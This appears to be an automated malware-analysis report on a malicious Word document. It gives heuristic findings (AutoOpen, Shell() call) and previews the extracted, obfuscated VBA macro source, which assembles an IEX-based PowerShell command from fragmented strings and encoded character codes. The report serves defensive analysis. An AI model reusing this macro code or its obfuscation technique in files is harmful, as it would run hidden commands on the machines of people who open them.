MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an intent to execute arbitrary commands. The obfuscated script attempts to construct a command string, likely for downloading and executing a second-stage payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30836 bytes |
SHA-256: 027f152379906d4a0e9a36f0b5ace9bee534cb7ea2caab74d56adf97b3d0b5ba |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BaDBJhMmoGmQRL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "afVpIwvPB"
Function pEvzbzqTffl()
On Error Resume Next
inVLE = (BACJt * 17031 + 3586 * CInt(NYOcK - CDbl(75686)) * 98414 * Oct(18341))
rvjhHIVi = "He" + "ll " + " & " + "( $" + "SHe" + "LL"
fDrqWw = (waiRCM * 57702 + 64003 * CInt(ktRGJZ - CDbl(46938)) * 67303 * Oct(45817))
pwiNYmP = "ID" + "[1" + "]+" + "$SH" + "Ell" + "Id"
MWURBZ = (wqIMU * 58980 + 7791 * CInt(MTakPB - CDbl(88924)) * 63884 * Oct(1372))
tarzt = "[13" + "]+'" + "X')" + " (" + " " + Chr(34)
tiCfGi = (SokEc * 17207 + 64030 * CInt(iNnZOP - CDbl(29363)) * 24918 * Oct(62089))
wGfYtMEp = "$( " + "se" + "t "
GwwIjR = (TqIrRT * 68037 + 56478 * CInt(CpTVj - CDbl(19706)) * 86195 * Oct(87845))
TWMUIKsoRH = "'Of" + "s'" + " '" + "') "
nGImLi = (WiAjK * 18380 + 15250 * CInt(PJSZz - CDbl(31562)) * 88095 * Oct(8870))
vWwVrh = Chr(34) + " +" + " [" + "St" + "Ri" + "Ng" + "](" + " (1"
KNZtKN = (FEctLh * 64045 + 60682 * CInt(Wvliwt - CDbl(85894)) * 65182 * Oct(1400))
InYoQE = "6,1" + "01," + " 10" + "1,1"
pEvzbzqTffl = rvjhHIVi + pwiNYmP + tarzt + wGfYtMEp + TWMUIKsoRH + vWwVrh + InYoQE
arTuQ = (BMbzEb * 22840 + 41096 * CInt(bGhOH - CDbl(64837)) * 53578 * Oct(74629))
End Function
Function IjZZjAh()
On Error Resume Next
dUIVwR = (rsDmD * 72923 + 19777 * CInt(zJVFh - CDbl(48385)) * 89840 * Oct(68764))
BOrSwdWdXO = "21" + ",10" + "1 ,"
dVnLT = (YwFYRv * 71743 + 61195 * CInt(KcNiH - CDbl(67598)) * 1691 * Oct(79005))
ckGNYvUtn = " 8" + "5," + " 2" + "0, " + "9," + " 2"
VPzMWE = (iltrc * 57523 + 18519 * CInt(zinwN - CDbl(86767)) * 31187 * Oct(26442))
ZDbuoRPI = "0,9" + "0, " + "81," + "67" + " ,"
HuFMLb = (djrpDw * 23842 + 54962 * CInt(BiKsn - CDbl(69999)) * 63156 * Oct(36943))
VqqvRmhDZl = " 2" + "5, " + "91 " + ", " + "86 " + ",9" + "4,"
jdvCbC = (CTEbz * 19706 + 43444 * CInt(MOwmU - CDbl(40865)) * 5727 * Oct(35779))
tTIKOvOrjuW = " 8" + "1," + "87," + " 64" + ", " + "20 " + ", "
wLKFV = (XNlXbw * 70569 + 52080 * CInt(ojBdH - CDbl(1864)) * 943 * Oct(83951))
iwUpnRslX = "70," + " 8" + "5 ," + "90" + ", "
IjZZjAh = BOrSwdWdXO + ckGNYvUtn + ZDbuoRPI + VqqvRmhDZl + tTIKOvOrjuW + iwUpnRslX
BfZou = (TjKlDP * 85687 + 99730 * CInt(dhNNmu - CDbl(20212)) * 53356 * Oct(76216))
End Function
Function ACHFSimjH()
On Error Resume Next
wkUZKJ = (UwEpQj * 38041 + 74969 * CInt(vozXq - CDbl(91958)) * 69050 * Oct(39648))
Fuwzzm = "80," + " 9" + "1,8"
anmERq = (lzvOz * 13242 + 99129 * CInt(FvuvrM - CDbl(96114)) * 88319 * Oct(51629))
XCwGFwG = "9 " + ", " + "15," + " 1" + "6," + " 12" + "0, "
zWcPAC = (zZkWL * 29740 + 62280 * CInt(lflXY - CDbl(8804)) * 77443 * Oct(78485))
wZJLoI = "82," + "68," + " 1" + "09," + " 6"
SuBod = (ctLVSU * 53647 + 41681 * CInt(tNzjPE - CDbl(88133)) * 61055 * Oct(27246))
qSOjN = "4, " + "68" + ", 2" + "0 ," + " 9 "
FhMVCi = (hEzFB * 23234 + 41956 * CInt(HdztOt - CDbl(18421)) * 18286 * Oct(78346))
qUszaPffEHL = ", " + "20," + "90," + "81" + ", 6" + "7 ,"
KEHZTY = (nGYGQ * 44996 + 18359 * CInt(GnXYrs - CDbl(3303)) * 57949 * Oct(89869))
ccrYjviI = " 2" + "5 " + ",91" + " ," + " 8"
ACHFSimjH = Fuwzzm + XCwGFwG + wZJLoI + qSOjN + qUszaPffEHL + ccrYjviI
bumzo = (XXrrZD * 14951 + 71204 * CInt(qOFzf - CDbl(83575)) * 11045 * Oct(80985))
End Function
Function ampcDITkTp()
On Error Resume Next
HFllz = (JaMSri * 55816 + 75356 * CInt(cjsjS - CDbl(34009)) * 5824 * Oct(60515))
JVKijj = "6 " + ",9" + "4,8" + "1,"
wAdwjP = (WEjsi * 19506 + 73313 * CInt(Eizrpt - CDbl(89866)) * 26158 * Oct(51856))
QRpmrpD = "87 " + ",64" + " ,2"
VwwZYk = (azmwI * 24052 + 88675 * CInt(BVatuk - CDbl(34556)) * 94131 * Oct(35943))
fSMlmbWkW = "0 " + ",10" + "3 ," + "77"
ampcDITkTp = JVKijj + QRpmrpD + fSMlmbWkW
jSLpsE = (CJKSRw * 61558 + 98704 * CInt(HLzdvV - CDbl(9894)) * 88216 * Oct(76410))
End Function
Function npJSRiDZRB()
On Error Resume
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.